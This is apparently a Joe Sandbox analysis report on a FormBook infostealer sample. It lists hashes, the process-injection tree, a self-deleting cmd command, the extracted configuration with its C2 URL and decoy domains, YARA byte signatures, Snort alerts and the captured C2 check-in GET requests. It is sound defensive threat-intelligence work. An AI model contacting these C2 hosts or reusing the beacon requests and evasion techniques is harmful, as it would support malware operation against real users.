Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
triage_dropped_file

Overview

General Information

Sample Name:triage_dropped_file (renamed file extension from none to exe)
Analysis ID:562157
MD5:f6eaacd1b39028130602ee0892e67663
SHA1:12ba0b4e8c41ececa29814f9b64da351e5509fb0
SHA256:1e144fefc15a6a2643674f01b3324e29b5320d45a16a081e8aad8a969712cb9d
Tags:exeformbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • triage_dropped_file.exe (PID: 3428 cmdline: "C:\Users\user\Desktop\triage_dropped_file.exe" MD5: F6EAACD1B39028130602EE0892E67663)
    • triage_dropped_file.exe (PID: 3212 cmdline: C:\Users\user\Desktop\triage_dropped_file.exe MD5: F6EAACD1B39028130602EE0892E67663)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6736 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • netsh.exe (PID: 6764 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 6840 cmdline: /c del "C:\Users\user\Desktop\triage_dropped_file.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hstolchsjybyl.com/a83r/"], "decoy": ["comercializadoralonso.com", "durhamschoolservces.com", "onegreencapital.com", "smartcities24.com", "maquinas.store", "brianlovesbonsai.com", "xin41518s.com", "moneyearnus.xyz", "be-mix.com", "fengyat.club", "inspectdecided.xyz", "paksafpakistan.com", "orhidlnt.top", "princesuraj.com", "vietnamvodka.com", "renewnow.site", "imageservices.xyz", "luxurytravelfranchise.com", "kp112.red", "royalyorkfirewood.com", "azharrizvi.com", "mtvamazon.com", "stlouisplatinumhomes.com", "ke6rkmtn.xyz", "roomviser.xyz", "rollcalloutfitters.com", "jlautoparts.net", "swipyy.xyz", "handymansaltlakecity.com", "tuespr.com", "prelink.xyz", "whrpky037.xyz", "yoga-4-health.com", "silvermoonandcompany.com", "meg-roh.com", "81218121.com", "prayerteamusa.com", "ocejxu.com", "lopeyhomeimporvementservice.com", "dcosearchandconnect.xyz", "md-newspages.online", "elinmex.online", "traineriq.com", "feministecologies.com", "gyltogether.com", "polyversed.com", "rodolforios.com", "bcfs0l.com", "51dmm.com", "metaverselivecasinos.com", "csjsgk.com", "impactincentivesregistry.com", "firekim.space", "jdzn.xyz", "d6ybf7yj.xyz", "sturt.xyz", "serious-cam.com", "stihl-gms.com", "gentleman5.xyz", "rustbeltcoders.net", "hmarketsed96.com", "cricfreelive.com", "wellyounow.com", "fwdrow.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18859:$sqlite3step: 68 34 1C 7B E1
    • 0x1896c:$sqlite3step: 68 34 1C 7B E1
    • 0x18888:$sqlite3text: 68 38 2A 90 C5
    • 0x189ad:$sqlite3text: 68 38 2A 90 C5
    • 0x1889b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
    0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x8937:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x993a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.triage_dropped_file.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.triage_dropped_file.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.triage_dropped_file.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a59:$sqlite3step: 68 34 1C 7B E1
        • 0x17b6c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a88:$sqlite3text: 68 38 2A 90 C5
        • 0x17bad:$sqlite3text: 68 38 2A 90 C5
        • 0x17a9b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bc3:$sqlite3blob: 68 53 D8 7F 8C
        5.0.triage_dropped_file.exe.400000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.0.triage_dropped_file.exe.400000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 18 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.hstolchsjybyl.com/a83r/"], "decoy": ["comercializadoralonso.com", "durhamschoolservces.com", "onegreencapital.com", "smartcities24.com", "maquinas.store", "brianlovesbonsai.com", "xin41518s.com", "moneyearnus.xyz", "be-mix.com", "fengyat.club", "inspectdecided.xyz", "paksafpakistan.com", "orhidlnt.top", "princesuraj.com", "vietnamvodka.com", "renewnow.site", "imageservices.xyz", "luxurytravelfranchise.com", "kp112.red", "royalyorkfirewood.com", "azharrizvi.com", "mtvamazon.com", "stlouisplatinumhomes.com", "ke6rkmtn.xyz", "roomviser.xyz", "rollcalloutfitters.com", "jlautoparts.net", "swipyy.xyz", "handymansaltlakecity.com", "tuespr.com", "prelink.xyz", "whrpky037.xyz", "yoga-4-health.com", "silvermoonandcompany.com", "meg-roh.com", "81218121.com", "prayerteamusa.com", "ocejxu.com", "lopeyhomeimporvementservice.com", "dcosearchandconnect.xyz", "md-newspages.online", "elinmex.online", "traineriq.com", "feministecologies.com", "gyltogether.com", "polyversed.com", "rodolforios.com", "bcfs0l.com", "51dmm.com", "metaverselivecasinos.com", "csjsgk.com", "impactincentivesregistry.com", "firekim.space", "jdzn.xyz", "d6ybf7yj.xyz", "sturt.xyz", "serious-cam.com", "stihl-gms.com", "gentleman5.xyz", "rustbeltcoders.net", "hmarketsed96.com", "cricfreelive.com", "wellyounow.com", "fwdrow.com"]}
          Multi AV Scanner detection for submitted file
          Source: triage_dropped_file.exeVirustotal: Detection: 52%Perma Link
          Source: triage_dropped_file.exeMetadefender: Detection: 21%Perma Link
          Source: triage_dropped_file.exeReversingLabs: Detection: 70%
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.triage_dropped_file.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.triage_dropped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.fengyat.club/a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU++//65IFIgHpMHnqLlfGYboARBAcbNtYvQ&v2=5jBLRl1pIZPlYAvira URL Cloud: Label: phishing
          Source: http://www.inspectdecided.xyz/a83r/?v2=5jBLRl1pIZPlY&k2MLx=ZSxafiwoPrw2VCRk9gX3wlOewDINgI1JCq9hgmGWZWQPOxIps9jFRiFeHjLrjNblu9AwAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: www.hstolchsjybyl.comVirustotal: Detection: 8%Perma Link
          Machine Learning detection for sample
          Source: triage_dropped_file.exeJoe Sandbox ML: detected
          Source: 5.2.triage_dropped_file.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.triage_dropped_file.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.triage_dropped_file.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.triage_dropped_file.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: triage_dropped_file.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: triage_dropped_file.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\mNyEIdHepa\src\obj\Debug\UCOMITypeL.pdb source: triage_dropped_file.exe
          Source: Binary string: netsh.pdb source: triage_dropped_file.exe, 00000005.00000002.364321923.0000000003460000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: triage_dropped_file.exe, 00000005.00000002.363232393.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, triage_dropped_file.exe, 00000005.00000002.363443966.000000000160F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000015.00000002.507374686.0000000003210000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000015.00000002.507739154.000000000332F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: triage_dropped_file.exe, 00000005.00000002.364321923.0000000003460000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: triage_dropped_file.exe, 00000005.00000002.363232393.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, triage_dropped_file.exe, 00000005.00000002.363443966.000000000160F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000015.00000002.507374686.0000000003210000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000015.00000002.507739154.000000000332F000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop esi

          Networking

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49811 -> 104.21.22.47:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49811 -> 104.21.22.47:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49811 -> 104.21.22.47:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49820 -> 81.17.29.148:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49820 -> 81.17.29.148:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49820 -> 81.17.29.148:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.22.47 80
          Source: C:\Windows\explorer.exeDomain query: www.inspectdecided.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.7 80
          Source: C:\Windows\explorer.exeDomain query: www.fengyat.club
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.inspectdecided.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.hstolchsjybyl.com/a83r/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /a83r/?v2=5jBLRl1pIZPlY&k2MLx=ZSxafiwoPrw2VCRk9gX3wlOewDINgI1JCq9hgmGWZWQPOxIps9jFRiFeHjLrjNblu9Aw HTTP/1.1Host: www.inspectdecided.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU++//65IFIgHpMHnqLlfGYboARBAcbNtYvQ&v2=5jBLRl1pIZPlY HTTP/1.1Host: www.fengyat.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 188.114.96.7 188.114.96.7
          Source: Joe Sandbox ViewIP Address: 188.114.96.7 188.114.96.7
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: netsh.exe, 00000015.00000002.508497222.0000000003C2F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.fengyat.club/a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU
          Source: unknownDNS traffic detected: queries for: www.inspectdecided.xyz
          Source: global trafficHTTP traffic detected: GET /a83r/?v2=5jBLRl1pIZPlY&k2MLx=ZSxafiwoPrw2VCRk9gX3wlOewDINgI1JCq9hgmGWZWQPOxIps9jFRiFeHjLrjNblu9Aw HTTP/1.1Host: www.inspectdecided.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU++//65IFIgHpMHnqLlfGYboARBAcbNtYvQ&v2=5jBLRl1pIZPlY HTTP/1.1Host: www.fengyat.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.triage_dropped_file.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.triage_dropped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 5.2.triage_dropped_file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.triage_dropped_file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.triage_dropped_file.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.triage_dropped_file.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.triage_dropped_file.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.triage_dropped_file.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.triage_dropped_file.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.triage_dropped_file.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.triage_dropped_file.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.triage_dropped_file.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.triage_dropped_file.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.triage_dropped_file.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.triage_dropped_file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.triage_dropped_file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
